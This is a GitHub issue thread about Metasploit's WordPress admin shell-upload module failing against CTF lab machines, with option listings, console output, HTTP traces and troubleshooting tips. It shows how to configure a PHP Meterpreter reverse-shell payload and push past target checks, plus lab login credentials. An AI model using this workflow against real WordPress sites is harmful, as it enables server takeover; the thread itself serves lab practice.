### ISSUE TITLE
 BROKEN MODULE: metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

### ISSUE THREAD

**Issue by Darkcast** [rapid7/metasploit-framework#10838]
I am running the Mr.Robot CTF and when I try to use the wp_admin_shell_upload.rb 
the module says that the site is not running wp.

PS. the ctf is running on a VMware

## Steps to reproduce
use metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
set requested data (see below)
Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   [redacted]        yes       The WordPress password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.0.16         yes       The target address
   RPORT      80                         yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  wp-login.php     yes       The base path to the wordpress application
   USERNAME   [redacted]                 yes       The WordPress username to authenticate with
   VHOST                                   no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.17     yes       The listen address (an interface may be specified)
   LPORT  4444                  yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

## Expected behavior

What should happen?
create a shell 
## Current behavior
msf exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.0.17:4444 
**[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**
**[*] Exploit completed, but no session was created.**
msf exploit(unix/webapp/wp_admin_shell_upload) > 

What happens instead?
it says the target is not using wp
You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces

### Metasploit version
msf exploit(unix/webapp/wp_admin_shell_upload) > version
Framework: 4.17.18-dev
Console  : 4.17.18-dev

### I installed Metasploit with:
- [X] Kali package via apt

### OS

What OS are you running Metasploit on?

KALI BABY WOOOOO

**Linux kali 4.18.0-kali1-amd64 #1 SMP Debian 4.18.6-1kali1 (2018-09-10) x86_64 GNU/Linux**

**Comment by bcoles** [comment]
You can disable the WordPress check with: `set WPCHECK false`

```
msf5 exploit(unix/webapp/wp_admin_shell_upload) > show advanced options

Module advanced options (exploit/unix/webapp/wp_admin_shell_upload):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for windows authentification
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, TLS1, TLS1.2, TLS1.1, SSL3, SSL23)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WPCHECK                 true                                                yes       Check if the website is a valid WordPress install
   WPCONTENTDIR            wp-content                                          yes       The name of the wp-content directory
   WfsDelay                0                                                   no        Additional delay when waiting for a session


Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf5 exploit(unix/webapp/wp_admin_shell_upload) > 
```

**Comment by wvu-r7** [comment]
Your `TARGETURI` of `wp-login.php` is incorrect. It should be `/` or other. The filename is added by the API.

**Comment by Gakovski** [comment]
I have similar problem, I had this problem but now I have another one.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Authenticating with WordPress using admin:password123...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.

(username and password are correct)

**Comment by h00die** [comment]
@Gakovski can you re-run with `show httptrace true`, that will better help with diagnosing.  What version of metasploit, and wordpress are being used?

**Comment by Gakovski** [comment]
@h00die 
here's the output with `httptrace` enabled
`msf6 exploit(unix/webapp/wp_admin_shell_upload) > set httptrace true
httptrace => true
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Authenticating with WordPress using admin:password123...
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 192.168.73.78                                                                                                                                                                                                                          
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                                                                                                                                                                               
Content-Type: application/x-www-form-urlencoded                                                                                                                                                                                              
Content-Length: 63                                                                                                                                                                                                                           
                                                                                                                                                                                                                                             
log=admin&pwd=password123&redirect_to=/YXvjYngE&wp-submit=Login                                                                                                                                                                              
####################
# Response:
####################
HTTP/1.0 301 Moved Permanently
Date: Thu, 20 May 2021 14:40:58 GMT                                                                                                                                                                                                          
Server: Apache/2.4.25 (Debian)                                                                                                                                                                                                               
Location: https://192.168.73.78wp-login.php                                                                                                                                                                                                  
Content-Length: 241                                                                                                                                                                                                                          
Connection: close                                                                                                                                                                                                                            
Content-Type: text/html; charset=iso-8859-1                                                                                                                                                                                                  
                                                                                                                                                                                                                                             
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                                                                                                                                                                           
<html><head>                                                                                                                                                                                                                                 
<title>301 Moved Permanently</title>                                                                                                                                                                                                         
</head><body>                                                                                                                                                                                                                                
<h1>Moved Permanently</h1>                                                                                                                                                                                                                   
<p>The document has moved <a href="https://192.168.73.78wp-login.php">here</a>.</p>                                                                                                                                                          
</body></html>                                                                                                                                                                                                                               
                                                                                                                                                                                                                                             
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.`
Metasploit version `metasploit v6.0.43-dev `
Wordpress version 3.7.2

**Comment by Gakovski** [comment]
@h00die here's the output with `httptrace` enabled

```
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Authenticating with WordPress using admin:password123...
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 192.168.73.78                                                                                                                                                                                                                          
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                                                                                                                                                                               
Content-Type: application/x-www-form-urlencoded                                                                                                                                                                                              
Content-Length: 63                                                                                                                                                                                                                           
                                                                                                                                                                                                                                             
log=admin&pwd=password123&redirect_to=/cqQAXBGJ&wp-submit=Login                                                                                                                                                                              
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Thu, 20 May 2021 14:49:11 GMT                                                                                                                                                                                                          
Server: Apache/2.4.25 (Debian)                                                                                                                                                                                                               
Content-Length: 362                                                                                                                                                                                                                          
Connection: close                                                                                                                                                                                                                            
Content-Type: text/html; charset=iso-8859-1                                                                                                                                                                                                  
                                                                                                                                                                                                                                             
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                                                                                                                                                                           
<html><head>                                                                                                                                                                                                                                 
<title>400 Bad Request</title>                                                                                                                                                                                                               
</head><body>                                                                                                                                                                                                                                
<h1>Bad Request</h1>                                                                                                                                                                                                                         
<p>Your browser sent a request that this server could not understand.<br />                                                                                                                                                                  
Reason: You're speaking plain HTTP to an SSL-enabled server port.<br />                                                                                                                                                                      
 Instead use the HTTPS scheme to access this URL, please.<br />                                                                                                                                                                              
</p>                                                                                                                                                                                                                                         
</body></html>                                                                                                                                                                                                                               
                                                                                                                                                                                                                                             
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
```
Metasploit version: `metasploit v6.0.43-dev`
Wordpress version: 3.7.2

It seems that the whole wordpress is read only and that's why I can't upload the payload.

Here's more information
If is use `set ssl true`, re-run the exploit, this is the output.
```

</head>                                                                                                                                                                                                                                      
<body id="error-page">                                                                                                                                                                                                                       
        <p>Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?</p></body>                                                                                                                 
</html>                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                             
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
```

**Comment by h00die** [comment]
Correct, you need `set ssl true`, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

**Comment by dikshit7040** [comment]
I am having the same problem! I tried to exploit after setting SSL to true, and as thrown with a different error. The username and password are correct. I have not shown here 
`
```
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.0.61:4444 
[*] Authenticating with WordPress using USERNAME:PASSWORD..
####################
# Request:
####################
POST /wp-login.php HTTP/1.1
Host: 10.10.95.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

log=elliot&pwd=ER28-0652&redirect_to=/nNCJdonU&wp-submit=Login
SSL_connect returned=1 errno=0 state=error: wrong version number
[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number
[*] Exploit completed, but no session was created.
```
`

Metasploit version: metasploit v6.0.48-dev

**Comment by Werew1942** [comment]
> Correct, you need `set ssl true`, and after that it looks like the server is configured to not allow creation of directories. This doesn't seem to be a metasploit issue, but a server configuration issue

Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

**Comment by bcoles** [comment]
> Sorry to open an old issue but how would one allow the creation of directories from wordpress admin itself?

It appears your issue is different to the issues described above. The error message you have received relates to a timeout.

**Comment by grepcoffee** [comment]
Could also be a timeout issue. try setting it like below. 

`set httpclienttimeout 60`

**Comment by d914e3ecf6cc481114a3f534a5faf90b** [comment]
If you are seeing: `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**`
Then please: `set wp-check false`

If you are seeing: `Exploit aborted due to failure: unexpected-reply: Failed to upload the payload`
Then please: `set httpclienttimeout 300`

Lastly, please confirm that IP you're using for LHOST is correct
For instance, if you're working the CTF through TryHackMe then please use your VPN IP

**Comment by d914e3ecf6cc481114a3f534a5faf90b** [comment]
Recently ran into this issue, here are my findings.

If you are seeing: `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**`
Then please: `set wp-check false`

If you are seeing: `Exploit aborted due to failure: unexpected-reply: Failed to upload the payload`
Then please: `set httpclienttimeout 300`

Lastly, please confirm that the IP you're using for LHOST is correct.
For instance, if you're working the CTF through TryHackMe then please use your VPN IP.

**Comment by d914e3ecf6cc481114a3f534a5faf90b** [comment]
Recently ran into this issue, here are my findings.

If you are seeing: `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**`
Then please: `set wp-check false`

If you are seeing: `Exploit aborted due to failure: unexpected-reply: Failed to upload the payload`
Then please: `set httpclienttimeout 300`

Lastly, please confirm that the IP you're using for LHOST is correct.
For instance, if you're working the CTF through TryHackMe then please use your VPN IP.

**Comment by bcoles** [comment]
> If you are seeing: `Exploit aborted due to failure: not-found: The target does not appear to be using WordPress**` Then please: `set wp-check false`

The option is called `WPCHECK` rather than `wp-check`.

```
set WPCHECK false
```

https://github.com/rapid7/metasploit-framework/blob/0436e8bad998d035e6558ebcbb2e878eaf898ce6/lib/msf/core/exploit/remote/http/wordpress.rb#L33

**Comment by secsalem** [comment]
I think there is sessions or something in the background that may trigger this , may need further research but for a quick solution that comes to mind >>

Restart VM or restart target machines
